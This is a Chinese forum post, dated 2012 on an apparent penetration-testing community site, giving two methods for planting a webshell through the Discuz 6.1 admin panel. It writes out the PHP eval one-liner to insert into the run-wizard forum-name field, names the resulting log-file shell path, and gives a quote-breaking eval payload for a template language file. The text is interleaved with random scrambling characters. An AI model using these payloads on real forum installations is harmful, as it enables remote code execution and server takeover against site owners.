中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
: o5 T5 j# ]+ F) F好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
1 g  @# m6 H" F4 f8 R; m+ t$ e- z1:
4 T9 k' o0 i0 i* |3 |" Uhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
9 u) m7 v% q% I" _  Tadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
1 h! p  h$ ?" A' B8 _* w. C* d<?php eval($_POST[cmd]);?>
4 R! d& _7 T4 o) p后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php* P  Q1 c" W4 _' x
% c% M3 O: c3 g
. Y/ \# O# p8 |  j" m
2:后台模板管理--默认模板套系--详情
, o  T4 e9 T3 R) y$ stemplates/default/actions.lang.php
" g. V+ J) S1 H9 ^jhackj\\');eval($_POST[cmd])?>;//
4 B0 y( e5 y7 x$ k5 z1 N9 G# h8 v) W' E1 X  ^$ `
利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2